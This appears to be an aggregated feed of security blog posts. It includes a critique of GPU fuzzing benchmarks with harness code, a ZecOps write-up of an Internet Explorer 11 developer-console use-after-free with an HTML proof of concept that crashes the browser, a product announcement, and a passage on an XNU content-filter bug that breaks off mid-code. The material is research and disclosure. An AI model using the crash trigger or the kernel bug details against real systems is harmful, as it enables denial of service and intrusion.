The blog talks about some of the hurdles in getting performant execution on GPUs, organization of data, handing virtual memory, etc. Once again, go read it. It’s really neat, the graphics alone make it a worthwhile read!

I’m super excited about this blog, mainly because it’s very similar to vectorized emulation that I’ve worked on in the past, and it starts answering questions about GPU-based fuzzing that I have been too lazy to look into. While this blog goes into some criticisms, it’s important to note that the research is only just starting, there is much progress to be had! It’s also important to note that this research has been being done by Ryan for only 2 months. That is incredible progress.


The Problems

Nevertheless, I have a few problems with the blog that stood out to me. I’m kind of always the asshole pointing these things out, but I think there are some important things to discuss.

The comparison

In the blog, the comparison being done and being presented is largely about comparing the performance of libfuzzer, against their GPU based fuzzer. Further, the comparisons are largely about the number of executions per second (or as I call them, fuzz cases per second), per unit US dollar. This comparison is largely to emphasize the cost efficiencies of fuzzing on the GPU, so we’ll keep that in mind. We don’t want to stray too far from their actual point.

Their hardware they’re testing on are 2 different Google Cloud Compute nodes which have various specs. The one used to benchmark libfuzzer is an n1-standard-8, this is a 4 core, 8 hyperthread, Intel Skylake machine. This costs $0.38/hour according to their blog, and of course, this checks out.

The other machine they’re testing on, for their GPU metrics, is a NVIDIA Tesla T4 single GPU compute node from Google Cloud Project. They claim this costs $0.35/hour, and once again, that’s accurate. This means the two machines are effectively the same price, and we’ll be able to compare them at a rough level without really taking into consideration their costs.

In their blog, they mention that “This isn’t an entirely fair comparison.”, and this is largely referring to that their fuzzer is not providing mutated inputs to the function, whereas libfuzzer is. This is a major issue. However, their fuzzer is resetting the state of the target every fuzz case, and libfuzzer is relying on the function not having any peristant state that needs to be reset. This gives libfuzzer a large advantage. Finally, the GPU based fuzzer also works on binaries, where libfuzzer requires source, so once again, there’s a lot of variables at play here. It is important to note, they’re mainly looking for order-of-magnitude estimates. But… this is a lot more than should be controlled for in my opinion. Important to also note that the blog concludes with a ~4x improvement from libfuzzer, thus, it’s well below the order-of-magnitude concerns of unfairness.

Of course, if you’ve read my blogs before. You’ll know I absolutely hate comparisons between problems with multiple variables. First of all, the cost of mutating an input is incredibly expensive, especially for a potentially large packet, say 1500 bytes. Further, the target which is being picked is a single function which does very little processing from first glance, but we’ll look into this more later.

So, let’s start off by eliminating one variable right away. What is the cost of generating an input from libfuzzer, and what is the cost of the actual function under test. This will effectively tell us how “fair” the execution comparison is, the binary vs source is subjective and clearly the binary-based engine is more impressive.

How do we do this? Well, let’s first figure out how fast libfuzzer can execute something that does literally nothing. This will give us a baseline of libfuzzer performance given it’s targeting something that does literally nothing.

#include <stdlib.h>
#include <stdint.h>

extern int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {
  return 0;  // Non-zero return values are reserved for future use.
}
clang-12 -fsanitize=fuzzer -O2 test.c

We’ll run this test on a Intel(R) Xeon(R) Gold 6252N CPU @ 2.30GHz turboing to 3.6 GHz. This isn’t the same as their GCP setup, but we’ll do some of our own comparisons locally, thus we’re talking about relatives and not absolutes.

They don’t talk much in their blog about what they used to seed libfuzzer, so we’ll just give it no seeds and cap the input size to 1500 bytes, or about a single MTU for a network packet.

pleb@grizzly:~/libpcap/harness$ ./a.out -max_len=1500
INFO: Running with entropic power schedule (0xFF, 100).
INFO: Seed: 2252408900
INFO: Loaded 1 modules   (1 inline 8-bit counters): 1 [0x4ea0b0, 0x4ea0b1), 
INFO: Loaded 1 PC tables (1 PCs): 1 [0x4c0840,0x4c0850), 
INFO: A corpus is not provided, starting from an empty corpus
#2      INITED cov: 1 ft: 1 corp: 1/1b exec/s: 0 rss: 27Mb
#8388608        pulse  cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 4194304 rss: 28Mb
#16777216       pulse  cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 3355443 rss: 28Mb
#33554432       pulse  cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 3050402 rss: 28Mb
#67108864       pulse  cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 3195660 rss: 28Mb
#134217728      pulse  cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 3121342 rss: 28Mb

Hmm, it seems it has settled in at about 3.12 million executions per second on a single core. Hmm, that seems a bit fast compared to the 1.9 million executions per second they see on their 8 thread machine in GCP, but maybe the target is really that complex and slows down performance.

Next, lets see how expensive the target code is outside of libfuzzer.

use std::time::Instant;
use pcap_sys::*;

#[link(name = "pcap")]
extern {
    fn bpf_filter_with_aux_data(
        pc: *const bpf_insn,
        p:  *const u8,
        wirelen: u32,
        buflen:  u32,
        aux_data: *const u8,
    );
}

fn main() {
    const ITERS: u64 = 100_000_000;

    unsafe {
        let mut program: bpf_program = std::mem::zeroed();

        // Ethernet linktype + 1500 snapshot length
        let pcap = pcap_open_dead(1, 1500);
        assert!(!pcap.is_null());

        // Compile the program
        let status = pcap_compile(pcap, &mut program,
            "dst host 1.2.3.4 or tcp or udp or ip or ip6 or arp or rarp or \
            atalk or aarp or decnet or iso or stp or ipx\0"
            .as_ptr() as *const _,
            1, PCAP_NETMASK_UNKNOWN);
        assert!(status == 0, "Failed to compile pcap thingy");

        let buf = vec![0u8; 1500];

        let time = Instant::now();
        for _ in 0..ITERS {
            // Filter a packet
            bpf_filter_with_aux_data(
                program.bf_insns,
                buf.as_ptr(),
                buf.len() as u32,
                buf.len() as u32,
                std::ptr::null()
            );
        }
        let elapsed = time.elapsed().as_secs_f64();

        print!("{:14.2} packets/second\n", ITERS as f64 / elapsed);
    }
}

We’re just going to compile the filter they mention in their blog, and then call bpf_filter_with_aux_data in a loop, applying the filter, and then we’ll print the number of iterations per second that we can do. In my specific case, I’m using libpcap-1.9.1 as distributed as a source code zip, this may differ slightly from their version.

pleb@grizzly:~/libpcap/harness$ RUSTFLAGS="-L../libpcap-1.9.1" cargo run --release
    Finished release [optimized] target(s) in 0.01s
     Running `target/release/harness`
   18703628.46 packets/second

Uh oh, that’s a bit concerning. The target can be executed about 18.7 million times per second, however libfuzzer is capped at pretty much a maximum of 3.1 million executions a second. This means the overhead of libfuzzer, which is not part of this comparison, is a factor of about 6. This means that libfuzzer is given about a 6x penalty, compared to the GPU fuzzer, which immediately gets rid of the ~4.4x advantage that the GPU fuzzer had over libfuzzer in their blog.

This unfortunately, was exactly as I expected. For a target this small, the overhead of creating an input greatly exceeds the cost of the target execution itself. This, unfortunately, makes the comparison against libfuzzer pretty much invalid in my eyes.

Trying to make the comparison closer

I’m lucky in that I have many binary-based snapshot fuzzers sitting around. It’s kind of my specialty. It’s important to note, from this point on, this comparison is for myself. It’s not to critique the blog, it’s simply for me to explore my performance against ToB’s GPU performance. I don’t care which one is better, this is largely for me to figure out if I personally want to start investing some time and money into GPU based fuzzing.

So, to start off, I’m going to compare the GPU fuzzer against my vectorized emulation. Vectorized emulation is a technique that I use to execute multiple VMs in parallel using AVX-512. In this specific case, I’m targeting a RISC-V processor (rv64ima) which will be emulated on my Intel machines by using AVX-512. Since 512 bits / 64 bits is 8, that means I’m running 8 VMs per hardware thread.

Vectorized emulation entirely contains only my own code. I wrote the lifters, the IL, the optimization passes, the JITs, the assemblers, the APIs, everything. This gives me a massive amount of control over adapting it to various targets, and make rapid changes to internals when needed. But, it also means, my code generation should be significantly worse than something like LLVM, as I do only the most basic optimizations (DCE, deduplication, etc). I don’t do any reordering, loop unrolling, memory access elision, etc.

Let’s try it!

The environment

To try to get as close to comparing against ToB’s GPU fuzzer, I’m going to fuzz a binary target and provide no mutation of the inputs. I’m simply going to use a 1500-byte buffer containing zeros. Unfortunately, there’s no specifics about what they used as an input, so we’re making the assumption that a 1500-byte zeroed out input and simply invoking bpf_filter_with_aux_data, waiting for it to return, then resetting VM memory back to the original state and running again is fair. Due to how many or conditions are used in the filter, and given the packet doesn’t match any, should mean we’re seeing the worst case performance (eg. evaluating all expressions). I’m not perfectly familiar with BPF filtering, but I’d imagine there’s an early exit on a match, and thus if the destination was 1.2.3.4, I’d suspect the performance would be improved. Without this being clarified from the ToB blog, we’re just going with worst case (unless I’m incorrect in my understanding of BPF filters, maybe there’s no early exit).

Anyways, the target code that I’m using is as such:

use std::time::Instant;
use pcap_sys::*;

#[link(name = "pcap")]
extern {
    fn bpf_filter_with_aux_data(
        pc: *const bpf_insn,
        p:  *const u8,
        wirelen: u32,
        buflen:  u32,
        aux_data: *const u8,
    );
}

#[no_mangle]
pub extern fn fuzz_external() {
    const ITERS: u64 = 1;

    unsafe {
        let mut program: bpf_program = std::mem::zeroed();

        // Ethernet linktype + 1500 snapshot length
        let pcap = pcap_open_dead(1, 1500);
        assert!(!pcap.is_null());

        // Compile the program
        let status = pcap_compile(pcap, &mut program,
            "dst host 1.2.3.4 or tcp or udp or ip or ip6 or arp or rarp or \
            atalk or aarp or decnet or iso or stp or ipx\0"
            .as_ptr() as *const _,
            1, PCAP_NETMASK_UNKNOWN);
        assert!(status == 0, "Failed to compile pcap thingy");

        let buf = vec![0x41u8; 1500];

		// Filter a packet
		bpf_filter_with_aux_data(
			program.bf_insns,
			buf.as_ptr(),
			buf.len() as u32,
			buf.len() as u32,
			std::ptr::null()
		);
    }
}

fn main() {
    fuzz_external();
}

This is effectively the same as above, but it no longer loops. But, since I’m using a binary-based snapshot fuzzer, and so are they, we’re going to actually snapshot it. So, instead of running this entire program every fuzz case, I’m going to put a breakpoint on the first instruction of bpf_filter_with_aux_data, and run the RISC-V JIT until it hits it. Once it hits that breakpoint, I will make a snapshot of the memory state, and at that point I will create threads which will work on executing it in a loop.

Further, I will add another breakpoint on the return site of bpf_filter_with_aux_data to immediately terminate the fuzz case upon return. This avoids having the program do cleanup (like freeing buf), and otherwise bubbling up to an exit() syscall. Their blog isn’t super clear about this, but from their wording, I suspect this is a pretty similar setup. Effectively, only bpf_filter_with_aux_data is executing, and once it is not, the VM is reset and run again.

My emulator has many different operating modes. I have different coverage levels (covering blocks, covering PCs, etc), different levels of memory protection (eg. byte-level permissions which cause every byte to have its own permissions), uninitialized memory tracking (accessing allocated memory and stacks is invalid unless it has been written to first), as well as register taint tracking (logging when user input affected register state for both register reads and writes).

Since many of these vary in performance, I’ve set up a few tests with a few common configurations. Further, I’ve provisioned a 60 core c2-standard-60 (30 Cascade Lake Intel cores, totalling 60 hyper-threads) machine from Google Cloud Project to try to apples-to-apples as best I can. This machine costs $3.1321/hour, and thus, we’ll have to divide by these costs to make it fair when we do dollar-based comparisons.

Here… we… go!

image

Okay cool, so what is this graph telling us? Well, it’s showing us the number of iterations per second per core on the Y axis, against the number of cores being used on the X axis. This is not just telling me the overall performance, but also the scaling performance of the fuzzer, or how well it uses cores.

We’re going to ignore all lines other than the top line, the one in purple (blue?). We see that the line is relatively flat until 30 cores, then it starts falling off. This is great! This lines up with ideally what we want. The emulator is scaling linearly as cores are added, until we start getting past 30 cores, where they become hyperthreads and they’re not actually physical cores. The fact that the line is flat until 30 cores makes me very happy, and a lot of painstaking engineering went into making that work!

Anyways, we have multiple lines here. The top line, to no surprise, is gathering no coverage information, isn’t tracking taint, nor is it checking permissions. Of course it’s the fastest. The next line, in green, only adds block-level code coverage. It’s almost no performance hit, and nor would I expect it to be. The JIT self-modifies once coverage has been reported, and thus the only cost is a bit of icache pollution due to some nopped out code being jumped over.

Next, we have the light blue line, which at this stage, is the first line that actually matters. This one adds checking of permissions, as well as uninitialized memory tracking. This is done at a byte-level, and thus behaves very similarly to ASAN (in fact, it allows arbitrary byte-sized holes in memory, where ASAN can only mark trailing bytes as inaccessible). This of course, has a performance cost. And this is the real line, there’s no way I’d ever run a fuzzer without permission checks as the target would simply crash the host. I could use a more relaxed permission checking model (like using the hardware MMU on Intel to provide 512-byte-level permissions (4096-byte pages / 8 VMs interleaved per page)), and I’d have the green line in performance, but it’s not worth it. Byte level is too important to me.

Finally, we have the orange line. This one adds register “taint” tracking. This effectively horizontally looks at neighboring VMs during execution to determine if one VM has written or read a different value to a register. This allows me to observe and feed back information about which register values are influenced by the user input, and thus is important information for cutting down on mutation wastes. That being said, we’re not mutating, so it doesn’t really matter, we’re just looking at the runtime costs of this instrumentation.

Where does this leave us? Well, we see that on the 60 core machine, with the light blue line (the one we care about), we end up getting about 4.1 million iterations per second per core. Since we’re running 60 cores (technically 60 threads) at this rate, we can just multiply to see that we’re getting about 250 million iterations per second on this 60 core c2-standard-60 machine.

Well, this is the number we want. What does this come out to for iterations/second/$? Simply divide 250 million by $3.1321/hour, and we get about 79.8 million iters/second/dollar/hour.

I don’t have access to their GPU code so I can’t reproduce it, but their number they claim is 8.4M iterations/second on the $0.35/hour GPU, and thus, 23.9 million iters/second/dollar/hour.

This gives vectorized emulation about a 3x advantage for performance per dollar compared to the GPU based compute. It’s important to note, both technologies have some pretty large improvements to performance which may be possible. I suspect with some optimization both could probably see 2-3x improvements, but at that point they start hitting some very real hardware limitations in performance.

Where does this leave us?

I have some suspicions that GPUs will struggle with low latency memory accesses, especially when so many VMs are diverging and doing different things. These benchmarks are best case for both these technologies, as the inputs aren’t affecting execution flow, and the memory utilization is quite low.

GPUs have some major memory limitations, that I think make them impractical for fuzzing. As mentioned in the ToB blog, a 16 GiB GPU running 40,000 threads only has 419 KiB per thread available for storage. This means the corpuses, coverage databases, and all modified memory by a fuzz case must be below 419 KiB. This unfortunately isn’t a very practical limit. Right now I’m doing some freetype2 fuzzing in light of the Google Project Zero CVE-2020-15999, and I’m pusing 50 GiB of memory use for the 1,536 VMs I run. Vecemu does memory deduplication and CoW for all memory, and thus my memory use is quite low. Ultimately, there are user-controlled allocations that occur and re-claiming the memory every fuzz case doesn’t prove very feasible. This is also a tiny target, I fuzz many targets where the input alone exceeds 1 MiB, let alone other memory used by the target.

Nevertheless, I think these problems may be solvable with creative use of transferring memory in blocks, or maybe chunking fuzz cases into sections which use less than 400 KiB at a time, or maybe just reduce the number of threads. There’s definitely solutions here, and I definitely don’t doubt that it’s possible, but I do wonder if the overheads and complexities beat what can be done directly on the CPU with massive caches and access to all memory at a relatively low cost (as opposed to GPU<->CPU memory access).

Is there more perf?

It’s important to note that my vectorized emulation is not running faster than native execution. I’m still emulating RISC-V and applying some really strict memory permission checks that slow things down, this makes my memory accesses really expensive. I am happy to see though, that vectorized emulation looks to be within about ~3x of native execution (18M packets/second in our native libpcap harness mentioned early on, 5.5M with ours). This is pretty crazy, given we’re working with binaries and applying byte-level permissions to a target which isn’t even supported by ASAN! How cool is that!?

Vectorized emulation runs close to or faster than native execution when the target has few memory loads and stores. This is by far the bottleneck (~80%+ of CPU time is spent doing my memory translations). Doing some optimization passes to reduce memory loads and stores in my IL would probably allow me to realize some of these gains.

Since I’m not running at native speeds, we know that this isn’t as fast as could be done by just building libpcap for x86 and running it. Of course this requires source, but we know that we can get about a 3x speedup by fuzzing it natively. Thus, if I have a 3x improvement on the GPU fuzzing cost effectiveness, and there’s a 3x speedup from my emulation to just “running it natively on x86”, then there’s a 9x improvement from GPU execution to just run it natively.

This kinda… proves my earlier point. The benchmark is not comparing libfuzzer to the GPU fuzzer, it’s comparing the GPU fuzzer running a target, compared to libfuzzer performing orchistration of a fuzzer and mutations. It’s just… not really comparing anything valuable. But of course, like I always complain about, public fuzzer performance is often not great. There are improvements we can get to our fuzzing harnesses, and as always, I implore people to explore the powers of in-memory, snapshot based fuzzing! Every time you do IPC, update an atomic, update/check a database, do an allocation, etc, you lose a lot of performance (when running at these speeds). For example, in vectorized emulation for this very blog, I had to batch my fuzz case increments to only happen a few times a second. Having all threads updating an atomic ~250M times a second resulted in about a 60% overall slowdown of the entire harness. When doing super tight loop fuzzing like this (as uncommon as it may be), the way we write fuzzing harnesses just doesn’t work.

But wait… what even are these dollar amounts?

So, it seems that vectorized emulation is only slightly faster than the GPU results (~3x). Vectorized emulation also has years of research into it, and the GPU research is fairly new. This 3x advantage is honestly not a big deal, it’s below the noise floor of what really matters when it comes to accessibility of hardware. If you can get GPUs or GPU developers easier than AVX-512 CPUs and developers, the 3x difference isn’t going to make a difference.

But we have to ask, why are we comparing dollar amounts? The dollar amounts are largely to determine what is most cost effective, that makes sense. But… something doesn’t seem right here.

The GPU they are using is an NVIDIA Tesla T4 and costs $0.35/hour on Google Cloud Project. The CPU they are using (for libfuzzer) is a quad core Skylake which costs $0.38/hour, or almost 10% more. What? An NVIDIA Tesla T4 is $2,152 (cheapest price I could find), and a quad core Skylake is $150. What the?

Once again, I hate the cloud. It’s a pretty big ripoff for long-running compute, but of course, it can save you IT costs and allow you to dynamically spin up.

But, for funsies, let’s check the performance per dollar for people who actually buy their hardware rather than use cloud compute.

For these benchmarks I’m going to use my own server that I host in my house and purchased for fuzzing. It’s a quad socket Xeon 6252N, which means that in total it has 96 cores and 192 threads, clocking at 2.3 GHz base, turboing to 3.6 GHz. The MSRP (and price I paid) for these processors is $1788. Thus, ~$7,152 for just the processors. Throw in about $2k for a server-grade chassis + motherboard + power supplies, and then ~$5k for 768 GiB of RAM, and you get to the $14-15k mark that I paid for this server. But, we’ll simplify it a bit, we don’t need 768 GiB of RAM for our example, so we’ll figure out what we want in GPUs.

For GPUs, the Tesla T4s are $2,152 per GPU, and have 16 GiB of RAM each. Lets just ignore all the PCI slotting, motherboards, and CPU required for a machine to host them, and we’ll just say we build the cheapest possible chassis, motherboard, PSU, and CPUs, and somehow can socket these in a $1k server. My server is about $9k just for the 4 CPUs + $2k in chassis and motherboards, and thus that leaves us with $8k budget for GPUs. Lets just say we buy 4 Tesla T4s and throw them in the $1k server, and we got them for $2k each. Okay, we have a 4 Tesla T4 machine and a 4 socket Xeon 6252N server for about $9k. We’re fudging some of the numbers to give the GPUs an advantage since a $1k chassis is cheap, so we’ll just say we threw 64 GiB into the server to match the GPUs ram and call it “even”.

Okay, so we have 2 theoretical systems. One with 96C/192T of Xeon 6252Ns and 64 GiB RAM, and one with 4 Tesla T4s with 64 GiB VRAM. They’re about $9k-$11k depending on what deals you can get, so we’ll say each one was $9k.

Well, how does it stack up?

I have the 4x 6252N system, so we’ll run vectorized emulation in “light blue” line mode (block coverage, byte-level permissions, uninitialized mem tracking, and no register taint tracking), this is a common mode for when I’m not fuzzing too deep on a target. Well, lets light up those cores.

lolcores

Sweet, we’re under 10 GiB of memory usage for the whole system, so we’re not really cheating by skimping on the memory in our theoretical 64 GiB build.

Well, we’re getting about 700 million fuzz cases per second on the whole system. Woo! That’s a shitton! That is 77k iters/second/$. Obviously this seems “lower” than what we saw before, but this is the iters/second for a one time dollar investment, not a per-hour cloud fee.

So… what do we get on the GPU? Well, they concluded with getting 8.4 million iters/sec on the cloud compute GPU. Assuming it’s close to the performance you get on bare metal (since they picked the non-preemptable GPU option), we can just multiply this number by 4 to get the iters/sec on this theoretical machine. We get 33.6 million iterations per second total, if we had 4 GPUs (assuming linear scaling and stuff, which I think is totally fair). Well… that’s 3,733 iters/second/$… or about 21x more expensive than vectorized emulation.

What gives? Well, the CPUs will definitely use more power, at 150W each you’ll be pushing 600W minimum, but I observe more in the ballpark of 1kW when running this server, when including peripherals and others. The Tesla T4 is 70W each, totalling 280W. This would likely be in a system which would be about 200W to run the CPU, chassis, RAM, etc, so lets say 500W. Well, it’d be about 1/2 the wattage of the CPU-based solution. Given power is pretty cheap (especially in the US), this difference isn’t too major, for me, I pay $0.10/kWh, thus the CPU server would cost about $0.20 per hour, and the GPU build would cost about $0.10 per hour (doubled for cooling). These are my “cloud compute” runtime costs, and thus the GPUs are still about 10x more expensive to run than the CPU solution.

Conclusion

As I’ve mentioned, this GPU based fuzzing stuff is incredibly cool. I can’t wait to see more. Unfortunately, some of the methodologies of the comparison aren’t very fair and thus I think the claims aren’t very compelling. It doesn’t mean the work isn’t thrilling, amazing, and incredibly hard, it just means it’s not really time yet to drop what we’re doing to invest in GPUs for fuzzing.

There’s a pretty large discrepency in the cost effectiveness of GPUs in the cloud, and this blog ends up getting a pretty large advantage over libfuzzer for something that is really just a pricing decision by the cloud providers. When purchasing your own gear, the GPUs are about 10x more expensive than the CPUs that were used in the blogs tests (quad-core Skylake @ $200 or so vs a NVIDIA T4 @ $2000). The cloud prices do not reflect this difference, and in the cloud, these two solutions are the same price. That being said, those are real gains. If GPUs are that much more cost effective in the cloud, then we should definitely try to use them!

Ultimately, when buying the hardware, the GPU solution is about 20x less cost effective than a CPU based solution (vectorized emulation). But even then, vectorized emulation is an emulator, and slower than native execution by a factor of 3, thus, compared to a carefully crafted, low-overhead fuzzer, the GPU solution is actually about 60x less cost effective.

But! The GPU solution (as well as vectorized emulation) allow for running closed-source binary targets in a highly efficient way, and that definitely is worth a performance loss. I’d rather be able to fuzz something at a 10x slowdown, than not being able to fuzz it at all (eg. needing source)!

Hats off to everyone at Trail of Bits who worked on this. This is incredibly cool research. I hope this blog didn’t come off as harsh, it’s mainly just me recording my thoughts as I’m always chasing the best solution for fuzzing! If that means I throw away vecemu to do GPU-based fuzzing, I will do it in a heartbeat. But, that decision is a heavy one, as I would need to invest thousands of hours in GPU development and retool my whole server room! These decisions are hard for me to make, and thus, I have to be very critical of all the evidence.

I can’t wait to see more research from you all! This is incredible. You’re giving me a real run for my money, and in only 2 months of work, fucking amazing! See you soon!


Random opinions

I’ve been asked a few things about my opinion on the GPU-based fuzzing, I’ll answer them here.

Is not having syscalls a problem?

No. It’s not. It is for people who want to use the tool. But this is a research tool and is for exploring what is possible, the act of fuzzing on a GPU by running binary translated code is incredible, that’s the focus here! GPUs are turing complete, we can definitely emulate syscalls on them if needed. It might be a lot of work, a lot of plumbing, maybe a perf hit, but it doesn’t stop it from being possible. Most of my fuzzers rely on emulating syscalls.

There’s also nothing preventing GPUs from being used to emulate an whole OS. You’d have to handle self-modifying code and virtual memory, which can get very expensive in an emulator, but with making software TLBs these things can be manageable to a level it’s still worth doing!


Social

I’ve been streaming a lot more regularly on my Twitch! I’ve developed hypervisors for fuzzing, mutators, emulators, and just done a lot of fun fuzzing work on stream. Come on by!

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up. I often will post data and graphs from data as it comes in and I learn!

Crash Reproduction Series: IE Developer Console UAF

13 October 2020 at 08:50
Crash Reproduction Series: IE Developer Console UAF

During a DFIR investigation, using ZecOps Crash Forensics on a developer’s computer we encountered a consistent crash on Internet Explorer 11. The TL;DR is that albeit this bug is not exploitable, it presents an interesting expansion to the attack surface through the Developer Consoles on browsers.

While examining the stack trace, we noticed a JavaScript engine failure. The type of the exception was a null pointer dereference, which is typically not alarming. We investigated further to understand whether this event can be exploited.

We examined the stack trace below: 

58c0cdba     mshtml!CDiagnosticsElementEventHelper::OnDOMEventListenerRemoved2+0xb
584d6ebc     mshtml!CDomEventRegistrationCallback2<CDiagnosticsElementEventHelper>::OnDOMEventListenerRemoved2+0x1a
584d8a1c     mshtml!DOMEventDebug::InvokeUnregisterCallbacks+0x100
58489f85     mshtml!CListenerAry::ReleaseAndDelete+0x42
582f6d3a     mshtml!CBase::RemoveEventListenerInternal+0x75
5848a9f7     mshtml!COmWindowProxy::RemoveEventListenerInternal+0x1a
582fb8b9     mshtml!CBase::removeEventListener+0x57
587bf1a5     mshtml!COmWindowProxy::removeEventListener+0x29
57584dae     mshtml!CFastDOM::CWindow::Trampoline_removeEventListener+0xb5
57583bb3     jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x1de
574d4492     jscript9!Js::JavascriptFunction::CallFunction<1>+0x93
[...more jscript9 functions]
581b0838     jscript9!ScriptEngineBase::Execute+0x9d
580b3207     mshtml!CJScript9Holder::ExecuteCallback+0x48
580b2fd3     mshtml!CListenerDispatch::InvokeVar+0x227
57fe5ad1     mshtml!CListenerDispatch::Invoke+0x6d
58194d17     mshtml!CEventMgr::_InvokeListeners+0x1ea
58055473     mshtml!CEventMgr::_DispatchBubblePhase+0x32
584d48aa     mshtml!CEventMgr::Dispatch+0x41e
584d387d     mshtml!CEventMgr::DispatchPointerEvent+0x1b0
5835f332     mshtml!CEventMgr::DispatchClickEvent+0x2c3
5835ce15     mshtml!CElement::Fire_onclick+0x37
583baa8e     mshtml!CElement::DoClick+0xd5
[...]

and noticed that the flow that led to the crash was:

  • An onclick handler fired due to a user input
  • The onclick handler was executed
  • removeEventListener was called

The crash happened at:

mshtml!CDiagnosticsElementEventHelper::OnDOMEventListenerRemoved2+0xb:

58c0cdcd 8b9004010000    mov     edx,dword ptr [eax+104h] ds:002b:00000104=????????

Relevant commands leading to a crash:

58c0cdc7 8b411c       mov     eax, dword ptr [ecx+1Ch]
58c0cdca 8b401c       mov     eax, dword ptr [eax+1Ch]
58c0cdcd 8b9004010000 mov     edx, dword ptr [eax+104h]

Initially ecx is the “this” pointer of the called member function’s class. On the first dereference we get a zeroed region, on the second dereference we get NULL, and on the third one we crash.

Reproduction

We tried to reproduce a legit call to mshtml!CDiagnosticsElementEventHelper::OnDOMEventListenerRemoved2 to see how it looks in a non-crashing scenario. We came to the conclusion that the event is called only when the IE Developer Tools window is open with the Events tab.

We found out that when the dev tools Events tab is opened, it subscribes to events for added and removed event listeners. When the dev tools window is closed, the event consumer is freed without unsubscribing, causing a use-after-free bug which results in a null dereference crash.

Summary

Tools such as Developer Options dynamically add additional complexity to the process and may open up additional attack surfaces.

Exploitation

Even though Use-After-Free (UAF) bugs can often be exploited for arbitrary code execution, this bug is not exploitable due to MemGC mitigation. The freed memory block is zeroed, but not deallocated while other valid objects still point to it. As a result, the referenced pointer is always a NULL pointer, leading to a non-exploitable crash.

Responsible Disclosure

We reported this issue to Microsoft, that decided to not fix this UAF issue.

POC

Below is a small HTML page that demonstrates the concept and leads to a crash.
Tested IE11 version: 11.592.18362.0
Update Versions: 11.0.170 (KB4534251)

<!DOCTYPE html>
<html>
<body>
<pre>
1. Open dev tools
2. Go to Events tab
3. Close dev tools
4. Click on Enable
</pre>
<button onclick="setHandler()">Enable</button>
<button onclick="removeHandler()">Disable</button>
<p id="demo"></p>
<script>
function myFunction() {
    document.getElementById("demo").innerHTML = Math.random();
}
function setHandler() {
    document.body.addEventListener("mousemove", myFunction);
}
function removeHandler() {
    document.body.removeEventListener("mousemove", myFunction);
}
</script>
</body>
</html>

Interested in researching browser & OS bugs daily?

ZecOps is expanding. We’re looking for additional researchers to join ZecOps Research Team. If you’re interested, send us a note at [email protected]

Hear the news first

  • Only essential content
  • New vulnerabilities & announcements
  • News from ZecOps Research Team

Your subscription request to ZecOps Blog has been successfully sent.
We won’t spam, pinky swear 🤞

ZecOps for Mobile DFIR 2.0 – Now Supporting iOS *AND* Android

8 October 2020 at 10:00
ZecOps for Mobile DFIR 2.0 – Now Supporting iOS *AND* Android

ZecOps is excited to announce the release of ZecOps for Mobile 2.0, which includes full support for Android. With this release, ZecOps has extended its best-in-class automatic digital forensics capabilities to the two most widespread and important mobile operating systems in the world, iOS and Android.

We see it in the news everyday: sophisticated threat actors can bypass all existing security defenses. These mistakes lead to sudden reboots, crashes, appearances in logs / OS telemetry, bugs, errors, battery loss, and other “unexplained” anomalies. ZecOps for Mobile analyzes the associated events against databases of attack techniques, common weaknesses (CWEs), and common vulnerabilities (CVEs). ZecOps’s core technology utilizes machine learning for insights, correlation and identifying anomalous behavior for 0-day attacks. Following a quick investigation, ZecOps produces a detailed assessment of if, when, and how a mobile device has been compromised.

World-leading governments, defense agencies, enterprises, and VIPs rely on ZecOps to automate their advanced investigations, greatly improving their threat intelligence, threat detection, APT hunting, and risk & compromise assessment capabilities. With support for Android, ZecOps can now extend this threat intelligence across an entire organization’s mobile footprint.

Supported versions:

  • Android 8 and above – until latest
  • iOS 10 and above – until latest

Supported HW Models:

  • All device models are supported on both Android and iOS.

ZecOps provides the most thorough operating system telemetry analysis as part of its advanced digital forensics. By focusing on the trails that hackers leave (“Attackers’ Mistakes”), ZecOps can provide sophisticated security organizations with critical information on the attackers’ tools, advanced persistent threats, and even discovery of attacks leveraging zero-day vulnerabilities.

.NET Grey Box Approach: Source Code Review & Dynamic Analysis

By: voidsec
7 October 2020 at 13:19

Following a recent engagement, I had the opportunity to check and verify some possible vulnerabilities on an ASP .NET application. Despite not being the deepest technical nor innovative blog post you could find on the net, I have decided to post it anyway in order to explain the methodology I adopt to verify possible vulnerabilities. […]

The post .NET Grey Box Approach: Source Code Review & Dynamic Analysis appeared first on VoidSec.

From a comment to a CVE: Content filter strikes again!

17 September 2020 at 02:44
From a comment to a CVE: Content filter strikes again!

0x0- Opening

In the past few years XNU had few vulns in a newly added/changed code areas (extra_recipe, kq double release) and in the content filter area (bug collision uaf, silent patched uaf) so it is no surprise that the combination of the newly added code and complex areas (content-filter) alongside with a funny comment caught our attention.

0x1- Discovery story

Upon a closer look at the newly added xnu source of Darwin 19 you might notice a strange comment in content_filter.c:

/*
 *	TO DO LIST
 *
 *	SOONER:
 *
 *	Deal with OOB
 *
 *	LATER:
 *
 *	If support datagram, enqueue control and address mbufs as well
 */

Is this comment referring to OOB read/write issues? Probably not but it won’t hurt to run a quick search for those so we will use the magic tool CMD +f to search for memcpy calls and in less than two minutes you will find the following 

0x2- The bug.

The newly updated cfil_sock_attach function which is easily reached from tcp_usr_connect and tcp_usr_connectx with controlled variables:

errno_t
cfil_sock_attach(struct socket *so, struct sockaddr *local, struct sockaddr *remote, int dir) // (Part A)
{
	errno_t error = 0;
	uint32_t filter_control_unit;

	socket_lock_assert_owned(so);

	/* Limit ourselves to TCP that are not MPTCP subflows */
	if ((so->so_proto->pr_domain->dom_family != PF_INET &&
	    so->so_proto->pr_domain->dom_family != PF_INET6) ||
	    so->so_proto->pr_type != SOCK_STREAM ||
	    so->so_proto->pr_protocol != IPPROTO_TCP ||
	    (so->so_flags & SOF_MP_SUBFLOW) != 0 ||
	    (so->so_flags1 & SOF1_CONTENT_FILTER_SKIP) != 0) {
		goto done;
	}

	filter_control_unit = necp_socket_get_content_filter_control_unit(so);
	if (filter_control_unit == 0) {
		goto done;
	}

	if (filter_control_unit == NECP_FILTER_UNIT_NO_FILTER) {
		goto done;
	}
